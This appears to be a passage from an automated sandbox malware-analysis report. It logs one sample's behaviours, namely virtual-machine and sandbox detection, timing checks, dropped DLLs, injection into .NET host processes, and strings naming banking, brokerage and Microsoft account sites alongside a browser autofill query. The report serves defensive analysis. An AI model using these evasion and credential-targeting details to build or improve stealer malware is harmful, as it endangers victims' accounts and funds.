                      Source: C:\Users\user\Desktop\CHA0VZiz8y.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                      Source: C:\Users\user\Documents\SimpleAdobe\0YXJTGaxIrryNdvx7SKozTjt.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                      Source: zfQlIB6J8n2u_zLV5LHnA1xW.exe, 0000000C.00000002.2320846713.0000000004210000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: AHAL9THJOHNDOEAVGHOOKX.DLLAVGHOOKA.DLLSNXHK.DLLSBIEDLL.DLLAPI_LOG.DLLDIR_WATCH.DLLPSTOREC.DLLVMCHECK.DLLWPESPY.DLLCMDVRT32.DLLCMDVRT64.DLL
                      Source: C:\Users\user\Documents\SimpleAdobe\_ebPmq_TcwNignYm0bf0ytJM.exeRDTSC instruction interceptor: First address: FBB0DE second address: FBB108 instructions: 0x00000000 rdtsc 0x00000002 dec cl 0x00000004 neg cl 0x00000006 xor cl, 0000003Ch 0x00000009 movzx dx, bl 0x0000000d movsx eax, bp 0x00000010 btr dx, 0043h 0x00000015 rol cl, 1 0x00000017 xor bl, cl 0x00000019 push esi 0x0000001a sub ax, dx 0x0000001d push ebp 0x0000001e and bp, 75F0h 0x00000023 rcl dx, 006Fh 0x00000027 push ebx 0x00000028 dec bl 0x0000002a rdtsc
                      Source: C:\Users\user\Documents\SimpleAdobe\xS7PhKcNZTx4FuBAD1RB9kbJ.exeMemory allocated: 2967CF20000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Documents\SimpleAdobe\xS7PhKcNZTx4FuBAD1RB9kbJ.exeMemory allocated: 2967EAB0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Documents\SimpleAdobe\A_22rjVO67ooiUk2ueyL6tMl.exeMemory allocated: 1120000 memory reserve | memory write watch
                      Source: C:\Users\user\Documents\SimpleAdobe\A_22rjVO67ooiUk2ueyL6tMl.exeMemory allocated: 2B40000 memory reserve | memory write watch
                      Source: C:\Users\user\Documents\SimpleAdobe\A_22rjVO67ooiUk2ueyL6tMl.exeMemory allocated: 4B40000 memory reserve | memory write watch
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 2CB0000 memory reserve | memory write watch
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 2D60000 memory reserve | memory write watch
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 4D60000 memory reserve | memory write watch
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 1710000 memory reserve | memory write watch
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 3120000 memory reserve | memory write watch
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 5120000 memory reserve | memory write watch
                      Source: C:\Users\user\Documents\SimpleAdobe\0YXJTGaxIrryNdvx7SKozTjt.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                      Source: C:\Users\user\AppData\Local\Temp\7zSD75.tmp\Install.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                      Source: C:\Users\user\Documents\SimpleAdobe\0YXJTGaxIrryNdvx7SKozTjt.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                      Source: C:\Users\user\Documents\SimpleAdobe\7U1bGcxK3Lqi_XMHDNEdJrhB.exeCode function: 7_2_0217171C rdtsc 7_2_0217171C
                      Source: C:\Users\user\Desktop\CHA0VZiz8y.exeThread delayed: delay time: 300000Jump to behavior
                      Source: C:\Users\user\Desktop\CHA0VZiz8y.exeThread delayed: delay time: 300000Jump to behavior
                      Source: C:\Users\user\Documents\SimpleAdobe\A_22rjVO67ooiUk2ueyL6tMl.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: threadDelayed 1564
                      Source: C:\Users\user\AppData\Local\Temp\kat806.tmpWindow / User API: threadDelayed 1120
                      Source: C:\Users\user\AppData\Local\Temp\is-KE107.tmp\_rSi8sV87ppx0bgkbETdFbEZ.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Turquoise CD Player\is-E4QTE.tmpJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-KE107.tmp\_rSi8sV87ppx0bgkbETdFbEZ.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Turquoise CD Player\msvcr120.dll (copy)Jump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-KE107.tmp\_rSi8sV87ppx0bgkbETdFbEZ.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Turquoise CD Player\libcurl.dll (copy)Jump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-KE107.tmp\_rSi8sV87ppx0bgkbETdFbEZ.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Turquoise CD Player\QtAVWidgets1.dll (copy)Jump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-KE107.tmp\_rSi8sV87ppx0bgkbETdFbEZ.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Turquoise CD Player\openh264.dll (copy)Jump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-KE107.tmp\_rSi8sV87ppx0bgkbETdFbEZ.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Turquoise CD Player\is-HB2OO.tmpJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-KE107.tmp\_rSi8sV87ppx0bgkbETdFbEZ.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Turquoise CD Player\Qt5OpenGL.dll (copy)Jump to dropped file
                      Source: C:\Users\user\Documents\SimpleAdobe\EEmC0rfrxeQDEUW4Qmh7BQX4.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\msvcp140[1].dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-KE107.tmp\_rSi8sV87ppx0bgkbETdFbEZ.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Turquoise CD Player\is-5LVFF.tmpJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-KE107.tmp\_rSi8sV87ppx0bgkbETdFbEZ.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Turquoise CD Player\Qt5Xml.dll (copy)Jump to dropped file
                      Source: C:\Users\user\Documents\SimpleAdobe\EEmC0rfrxeQDEUW4Qmh7BQX4.exeDropped PE file which has not been started: C:\ProgramData\softokn3.dllJump to dropped file
                      Source: C:\Users\user\Documents\SimpleAdobe\EEmC0rfrxeQDEUW4Qmh7BQX4.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\vcruntime140[1].dllJump to dropped file
                      Source: C:\Users\user\Documents\SimpleAdobe\EEmC0rfrxeQDEUW4Qmh7BQX4.exeDropped PE file which has not been started: C:\ProgramData\nss3.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-KE107.tmp\_rSi8sV87ppx0bgkbETdFbEZ.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Turquoise CD Player\is-JVAO2.tmpJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-KE107.tmp\_rSi8sV87ppx0bgkbETdFbEZ.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Turquoise CD Player\msvcp140_1.dll (copy)Jump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-KE107.tmp\_rSi8sV87ppx0bgkbETdFbEZ.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Turquoise CD Player\is-CKPLA.tmpJump to dropped file
                      Source: C:\Users\user\Documents\SimpleAdobe\A_22rjVO67ooiUk2ueyL6tMl.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Protect544cd51a.dllJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\sqls[1].dllJump to dropped file
                      Source: C:\Users\user\Documents\SimpleAdobe\EEmC0rfrxeQDEUW4Qmh7BQX4.exeDropped PE file which has not been started: C:\ProgramData\freebl3.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-KE107.tmp\_rSi8sV87ppx0bgkbETdFbEZ.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Turquoise CD Player\is-9ULQD.tmpJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-KE107.tmp\_rSi8sV87ppx0bgkbETdFbEZ.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Turquoise CD Player\msvcp120.dll (copy)Jump to dropped file
                      Source: C:\Users\user\Documents\SimpleAdobe\EEmC0rfrxeQDEUW4Qmh7BQX4.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\mozglue[1].dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-KE107.tmp\_rSi8sV87ppx0bgkbETdFbEZ.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-MGI15.tmp\_isetup\_RegDLL.tmpJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-KE107.tmp\_rSi8sV87ppx0bgkbETdFbEZ.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Turquoise CD Player\is-FS8TN.tmpJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-KE107.tmp\_rSi8sV87ppx0bgkbETdFbEZ.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Turquoise CD Player\libmp3lame.dll (copy)Jump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-KE107.tmp\_rSi8sV87ppx0bgkbETdFbEZ.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Turquoise CD Player\is-F6JQ6.tmpJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-KE107.tmp\_rSi8sV87ppx0bgkbETdFbEZ.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Turquoise CD Player\is-46IH9.tmpJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-KE107.tmp\_rSi8sV87ppx0bgkbETdFbEZ.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Turquoise CD Player\avdevice-58.dll (copy)Jump to dropped file
                      Source: C:\Users\user\Documents\SimpleAdobe\EEmC0rfrxeQDEUW4Qmh7BQX4.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\nss3[1].dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-KE107.tmp\_rSi8sV87ppx0bgkbETdFbEZ.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Turquoise CD Player\is-U2S42.tmpJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-KE107.tmp\_rSi8sV87ppx0bgkbETdFbEZ.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Turquoise CD Player\unins000.exe (copy)Jump to dropped file
                      Source: C:\Users\user\Documents\SimpleAdobe\EEmC0rfrxeQDEUW4Qmh7BQX4.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\freebl3[1].dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-KE107.tmp\_rSi8sV87ppx0bgkbETdFbEZ.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Turquoise CD Player\is-99KJO.tmpJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-KE107.tmp\_rSi8sV87ppx0bgkbETdFbEZ.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Turquoise CD Player\is-2FJL8.tmpJump to dropped file
                      Source: C:\Users\user\Documents\SimpleAdobe\EEmC0rfrxeQDEUW4Qmh7BQX4.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\softokn3[1].dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-KE107.tmp\_rSi8sV87ppx0bgkbETdFbEZ.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Turquoise CD Player\is-3LABF.tmpJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-KE107.tmp\_rSi8sV87ppx0bgkbETdFbEZ.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-MGI15.tmp\_isetup\_setup64.tmpJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-KE107.tmp\_rSi8sV87ppx0bgkbETdFbEZ.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-MGI15.tmp\_isetup\_isdecmp.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-KE107.tmp\_rSi8sV87ppx0bgkbETdFbEZ.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-MGI15.tmp\_isetup\_iscrypt.dllJump to dropped file
                      Source: C:\Users\user\Documents\SimpleAdobe\MYZqYdU5cUVwEz2j0JYbnTar.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\eKhLlZQ.cplJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-KE107.tmp\_rSi8sV87ppx0bgkbETdFbEZ.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Turquoise CD Player\is-JE3T2.tmpJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-KE107.tmp\_rSi8sV87ppx0bgkbETdFbEZ.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Turquoise CD Player\is-BEO98.tmpJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-KE107.tmp\_rSi8sV87ppx0bgkbETdFbEZ.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Turquoise CD Player\libeay32.dll (copy)Jump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-KE107.tmp\_rSi8sV87ppx0bgkbETdFbEZ.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-MGI15.tmp\_isetup\_shfoldr.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-KE107.tmp\_rSi8sV87ppx0bgkbETdFbEZ.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Turquoise CD Player\mousehelper.dll (copy)Jump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-KE107.tmp\_rSi8sV87ppx0bgkbETdFbEZ.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Turquoise CD Player\Qt5WinExtras.dll (copy)Jump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-KE107.tmp\_rSi8sV87ppx0bgkbETdFbEZ.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Turquoise CD Player\Qt5Svg.dll (copy)Jump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-KE107.tmp\_rSi8sV87ppx0bgkbETdFbEZ.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Turquoise CD Player\is-KQVQS.tmpJump to dropped file
                      Source: C:\Users\user\Desktop\CHA0VZiz8y.exe TID: 2672Thread sleep count: 280 > 30Jump to behavior
                      Source: C:\Users\user\Desktop\CHA0VZiz8y.exe TID: 2672Thread sleep time: -56000s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\CHA0VZiz8y.exe TID: 6800Thread sleep time: -300000s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\CHA0VZiz8y.exe TID: 5292Thread sleep time: -300000s >= -30000sJump to behavior
                      Source: C:\Users\user\Documents\SimpleAdobe\Zy329tNpRVznAcNUeSg4uGuQ.exe TID: 3168Thread sleep count: 113 > 30
                      Source: C:\Users\user\Documents\SimpleAdobe\Zy329tNpRVznAcNUeSg4uGuQ.exe TID: 2892Thread sleep count: 56 > 30
                      Source: C:\Users\user\Documents\SimpleAdobe\Zy329tNpRVznAcNUeSg4uGuQ.exe TID: 2892Thread sleep count: 44 > 30
                      Source: C:\Users\user\Documents\SimpleAdobe\A_22rjVO67ooiUk2ueyL6tMl.exe TID: 1868Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\Documents\SimpleAdobe\0YXJTGaxIrryNdvx7SKozTjt.exe TID: 7456Thread sleep time: -30000s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 18224Thread sleep time: -6456360425798339s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7060Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\kat806.tmp TID: 2748Thread sleep count: 1120 > 30
                      Source: C:\Users\user\AppData\Local\Temp\kat806.tmp TID: 2748Thread sleep time: -7840000s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7912Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Local\Turquoise CD Player\turquoisecdplayer.exeFile opened: PhysicalDrive0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Documents\SimpleAdobe\_ebPmq_TcwNignYm0bf0ytJM.exeLast function: Thread delayed
                      Source: C:\Users\user\Documents\SimpleAdobe\_ebPmq_TcwNignYm0bf0ytJM.exeLast function: Thread delayed
                      Source: C:\Users\user\Documents\SimpleAdobe\Zy329tNpRVznAcNUeSg4uGuQ.exeLast function: Thread delayed
                      Source: C:\Users\user\Documents\SimpleAdobe\Zy329tNpRVznAcNUeSg4uGuQ.exeLast function: Thread delayed
                      Source: C:\Users\user\Documents\SimpleAdobe\EPA5EhRzK9ZnpAjdUqLJteUs.exeLast function: Thread delayed
                      Source: C:\Users\user\AppData\Local\Temp\kat806.tmpLast function: Thread delayed
                      Source: C:\Users\user\AppData\Local\Temp\kat806.tmpLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Users\user\Documents\SimpleAdobe\ogoGQsWFwF_EcodN5qF7hiVC.exeCode function: 9_2_00464303 FindFirstFileExW,9_2_00464303
                      Source: C:\Users\user\Documents\SimpleAdobe\J9jGBSSbDD3yrTx79DzmOLls.exeCode function: 11_2_00AB4303 FindFirstFileExW,11_2_00AB4303
                      Source: C:\Users\user\Desktop\CHA0VZiz8y.exeThread delayed: delay time: 300000Jump to behavior
                      Source: C:\Users\user\Desktop\CHA0VZiz8y.exeThread delayed: delay time: 300000Jump to behavior
                      Source: C:\Users\user\Documents\SimpleAdobe\A_22rjVO67ooiUk2ueyL6tMl.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\Documents\SimpleAdobe\xS7PhKcNZTx4FuBAD1RB9kbJ.exeFile opened: C:\Users\userJump to behavior
                      Source: C:\Users\user\Documents\SimpleAdobe\xS7PhKcNZTx4FuBAD1RB9kbJ.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
                      Source: C:\Users\user\Documents\SimpleAdobe\xS7PhKcNZTx4FuBAD1RB9kbJ.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
                      Source: C:\Users\user\Documents\SimpleAdobe\xS7PhKcNZTx4FuBAD1RB9kbJ.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                      Source: C:\Users\user\Documents\SimpleAdobe\xS7PhKcNZTx4FuBAD1RB9kbJ.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                      Source: C:\Users\user\Documents\SimpleAdobe\xS7PhKcNZTx4FuBAD1RB9kbJ.exeFile opened: C:\Users\user\AppDataJump to behavior
                      Source: RPA18tS89oJgBrOTDKzODMll.exe, 00000015.00000002.2638218770.0000000140CE7000.00000020.00000001.01000000.00000015.sdmpBinary or memory string: hgFSu
                      Source: EPA5EhRzK9ZnpAjdUqLJteUs.exe, 0000000F.00000003.2607403739.0000000001C9F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: formVMware20,11696428655
                      Source: EPA5EhRzK9ZnpAjdUqLJteUs.exe, 0000000F.00000003.2608954397.0000000001CA9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                      Source: EPA5EhRzK9ZnpAjdUqLJteUs.exe, 0000000F.00000003.2608954397.0000000001CA9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                      Source: EPA5EhRzK9ZnpAjdUqLJteUs.exe, 0000000F.00000003.2608954397.0000000001CA9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696428655
                      Source: EPA5EhRzK9ZnpAjdUqLJteUs.exe, 0000000F.00000003.2607403739.0000000001C9F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ccount.microsoft.com/profileVMware20,11696428655u
                      Source: CHA0VZiz8y.exe, CHA0VZiz8y.exe, 00000000.00000003.2061989143.00000000004D8000.00000004.00000020.00020000.00000000.sdmp, Zy329tNpRVznAcNUeSg4uGuQ.exe, 0000000A.00000003.2719544361.00000000016C0000.00000004.00000020.00020000.00000000.sdmp, 0YXJTGaxIrryNdvx7SKozTjt.exe, 00000013.00000002.2616507052.0000000000FF8000.00000004.00000020.00020000.00000000.sdmp, 0YXJTGaxIrryNdvx7SKozTjt.exe, 00000013.00000002.2616507052.000000000103C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                      Source: EPA5EhRzK9ZnpAjdUqLJteUs.exe, 0000000F.00000003.2607403739.0000000001C9F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,116964288
                      Source: EPA5EhRzK9ZnpAjdUqLJteUs.exe, 0000000F.00000003.2608954397.0000000001CA9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                      Source: EPA5EhRzK9ZnpAjdUqLJteUs.exe, 0000000F.00000003.2607403739.0000000001C9F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696
                      Source: ZMyjNtrJZsXoQ4xLeKYzrWJD.exe, 0000000D.00000003.2316053830.00000000011E4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: EPA5EhRzK9ZnpAjdUqLJteUs.exe, 0000000F.00000003.2607403739.0000000001C9F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: eVMware20,11696428655
                      Source: EPA5EhRzK9ZnpAjdUqLJteUs.exe, 0000000F.00000003.2607403739.0000000001C9F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: r global passwords blocklistVMware20,11696428655
                      Source: EPA5EhRzK9ZnpAjdUqLJteUs.exe, 0000000F.00000003.2608954397.0000000001CA9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                      Source: EPA5EhRzK9ZnpAjdUqLJteUs.exe, 0000000F.00000003.2607403739.0000000001C9F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware20,11696428655
                      Source: ZMyjNtrJZsXoQ4xLeKYzrWJD.exe, 0000000D.00000003.2434788379.0000000005F69000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}42r(Q
                      Source: EPA5EhRzK9ZnpAjdUqLJteUs.exe, 0000000F.00000003.2608954397.0000000001CA9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696428655
                      Source: EPA5EhRzK9ZnpAjdUqLJteUs.exe, 0000000F.00000003.2608954397.0000000001CA9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696428655o
                      Source: EPA5EhRzK9ZnpAjdUqLJteUs.exe, 0000000F.00000003.2608954397.0000000001CA9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                      Source: EPA5EhRzK9ZnpAjdUqLJteUs.exe, 0000000F.00000003.2608954397.0000000001CA9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696428655
                      Source: EPA5EhRzK9ZnpAjdUqLJteUs.exe, 0000000F.00000003.2608954397.0000000001CA9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                      Source: EPA5EhRzK9ZnpAjdUqLJteUs.exe, 0000000F.00000003.2608954397.0000000001CA9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                      Source: EPA5EhRzK9ZnpAjdUqLJteUs.exe, 0000000F.00000003.2607403739.0000000001C9F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CT name, value FROM autofillmain'.sqlite_masterr global passwords blocklistVMware20,11696428655
                      Source: EPA5EhRzK9ZnpAjdUqLJteUs.exe, 0000000F.00000003.2607403739.0000000001C9F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ra Change Transaction PasswordVMware20,11696428655
                      Source: MYZqYdU5cUVwEz2j0JYbnTar.exe, 00000011.00000002.2593523697.0000000002C02000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}y
                      Source: EPA5EhRzK9ZnpAjdUqLJteUs.exe, 0000000F.00000003.2385443354.0000000001BBD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}r
                      Source: EPA5EhRzK9ZnpAjdUqLJteUs.exe, 0000000F.00000003.2607403739.0000000001C9F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: o.inVMware20,11696428655~
                      Source: EPA5EhRzK9ZnpAjdUqLJteUs.exe, 0000000F.00000003.2608954397.0000000001CA9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696428655x
                      Source: 0YXJTGaxIrryNdvx7SKozTjt.exe, 00000013.00000003.2348977725.0000000002B30000.00000004.00001000.00020000.00000000.sdmp, 0YXJTGaxIrryNdvx7SKozTjt.exe, 00000013.00000003.2336458213.0000000002B30000.00000004.00001000.00020000.00000000.sdmp, 0YXJTGaxIrryNdvx7SKozTjt.exe, 00000013.00000003.2338090055.0000000002B30000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: \SystemRoot\system32\ntkrnlm.exeSDT\VBOX__
                      Source: EPA5EhRzK9ZnpAjdUqLJteUs.exe, 0000000F.00000003.2608954397.0000000001CA9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                      Source: EPA5EhRzK9ZnpAjdUqLJteUs.exe, 0000000F.00000003.2608954397.0000000001CA9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                      Source: EPA5EhRzK9ZnpAjdUqLJteUs.exe, 0000000F.00000003.2607403739.0000000001C9F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696428650
                      Source: svchost.exe, 00000004.00000003.2055807324.000001F53C844000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
